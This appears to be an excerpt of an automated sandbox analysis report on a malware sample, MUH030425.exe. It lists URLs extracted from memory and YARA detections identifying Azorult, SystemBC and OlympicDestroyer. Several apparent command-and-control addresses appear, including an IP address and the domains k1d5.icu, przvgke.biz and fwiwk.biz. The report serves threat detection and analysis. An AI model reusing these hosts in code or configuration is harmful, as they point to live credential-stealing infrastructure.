              Source: alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/reeuv
              Source: RegSvcs.exe, 00000008.00000002.1601150507.000000000120D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/wt
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: MUH030425.exeString found in binary or memory: http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn
              Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1603192431.0000000003330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://k1d5.icu/TP341/index.php
              Source: RegSvcs.exe, 00000008.00000002.1603192431.0000000003330000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://k1d5.icu/TP341/index.phph
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: MUH030425.exe, 00000000.00000002.1686714780.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNzB8fHx8fHw2N2M2YmI1NjUxOD
Source: alg.exe, 0000000D.00000003.1955019744.0000000000545000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2107290818.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2118070130.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1967145828.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2047366590.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/xrkixnpk?usid=18&utid=30152687444
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz:80/xrkixnpk?usid=18&utid=30152687444Pn:
              Source: alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTV8fHx8fHw2N2M2YmIyZDM4
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/cygwkoswoy?usid=18&utid=30152678086
              Source: alg.exe, 0000000D.00000003.1878733120.0000000000521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/gedtsq?usid=18&utid=30152678479
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892690377.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1838038969.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1878733120.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1543980844.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1553956256.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798107286.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz:80/gedtsq?usid=18&utid=30152678479
Source: alg.exe, 0000000D.00000003.1955019744.0000000000545000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2107290818.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2118070130.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1967145828.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2047366590.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2161214560.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz/yhikx?usid=18&utid=30152687280
              Source: alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944621326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.fwiwk.biz:80/yhikx?usid=18&utid=30152687280P
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/b?usid=18&utid=30152678348
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/b?usid=18&utid=30152678348Sje
              Source: alg.exe, 0000000D.00000003.1555833531.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576172278.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1790563475.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1838038969.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1798846224.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1908959853.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1797899601.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907606835.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1572794877.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1892475238.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/en?usid=18&utid=30152678739
              Source: alg.exe, 0000000D.00000003.1553956256.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz:80/en?usid=18&utid=30152678739P
              Source: alg.exe, 0000000D.00000003.2270507357.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/
              Source: alg.exe, 0000000D.00000003.2270739736.0000000000680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/8
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
              Source: alg.exe, 0000000D.00000003.1636988813.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: alg.exe, 0000000D.00000003.2112196038.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
              Source: alg.exe, 0000000D.00000003.2038996262.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
              Source: alg.exe, 0000000D.00000003.2038996262.0000000001540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report..
              Source: alg.exe, 0000000D.00000003.1695292605.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
              Source: alg.exe, 0000000D.00000003.1695827522.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1695966946.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: alg.exe, 0000000D.00000003.2112271794.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
              Source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1543338864.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1954786173.0000000001510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://euob.seaskydvd.com/sxp/i/224f85302aa2b6ec30aac9a85da2cbf9.js
              Source: alg.exe, 0000000D.00000003.2095233929.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1
              Source: alg.exe, 0000000D.00000003.2095233929.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in
              Source: setup.exe1.13.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: setup.exe1.13.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: alg.exe, 0000000D.00000003.2112343455.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
              Source: alg.exe, 0000000D.00000003.2112343455.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
              Source: alg.exe, 0000000D.00000003.2095519854.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/default-browser-agent/default-browser/1/Hash
              Source: alg.exe, 0000000D.00000003.2111979719.0000000000430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1601150507.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033ws
              Source: RegSvcs.exe, 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfic
              Source: RegSvcs.exe, 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.sr8
              Source: RegSvcs.exe, 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf
              Source: RegSvcs.exe, 00000008.00000002.1601150507.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1601150507.0000000001235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1954786173.0000000001510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=fwiwk.biz
              Source: alg.exe, 0000000D.00000003.1543338864.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
              Source: alg.exe, 0000000D.00000003.1544371487.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/munin/a/tr/click
              Source: alg.exe, 0000000D.00000003.1955445110.0000000001840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trkpcna.net/munin/a/tr/click
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001253000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.0000000000545000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2089955706.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2197748874.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2107290818.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2118070130.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1967145828.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1555956968.000000000052F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1552930830.0000000000532000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2047366590.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2079601241.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2153120949.0000000000546000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1572794877.0000000000532000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.0000000000546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com

              System Summary

              Source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects SystemBC Author: ditekSHen
              Source: 8.2.RegSvcs.exe.4eee249.7.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult Payload Author: kevoreilly
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Azorult Payload Author: kevoreilly
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Windows\System32\alg.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\eab56394c76d7db5.bin
              Source: C:\Windows\System32\wbengine.exe | File created: C:\Windows\Logs\WindowsBackup
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Load Driver
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Security
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00404E64 appears 33 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 004062D8 appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00403B98 appears 44 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 00404E3C appears 87 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 004034E4 appears 36 times
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1792
              Source: SingleClientServicesUpdater.exe.8.dr | Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
              Source: elevation_service.exe.8.dr | Static PE information: Number of sections : 12 > 10
              Source: elevation_service.exe0.8.dr | Static PE information: Number of sections : 12 > 10
              Source: api-ms-win-core-heap-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-multibyte-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-private-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.8.dr | Static PE information: No import functions for PE file found
              Source: MUH030425.exe, 00000000.00000002.1691032810.00000000042F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs MUH030425.exe
